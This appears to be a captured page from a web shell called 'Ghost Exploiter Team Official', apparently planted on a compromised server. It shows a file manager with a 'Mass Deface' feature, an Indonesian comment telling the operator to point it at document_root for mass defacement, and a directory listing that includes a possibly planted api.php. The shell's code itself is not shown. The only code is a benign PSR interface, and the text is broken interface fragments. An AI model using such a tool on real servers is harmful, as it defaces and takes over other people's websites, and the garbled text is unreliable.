Ghost Exploiter Team Official
Mass Deface
Directory >>
/
var
/
www
/
html
/
back
/
vendor
/
psr
/
container
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
type
file
dir
+File/Dir
src
--
ren
-20260127235045.gitignore
0.036KB
edt
ren
.gitignore
0.036KB
edt
ren
ContainerExceptionInter
...
0.18KB
edt
ren
LICENSE
1.118KB
edt
ren
README.md
0.564KB
edt
ren
api.php
1.377KB
edt
ren
composer.json
0.64KB
edt
ren
<?php namespace Psr\Container; use Throwable; /** * Base interface representing a generic exception in a container. */ interface ContainerExceptionInterface extends Throwable { }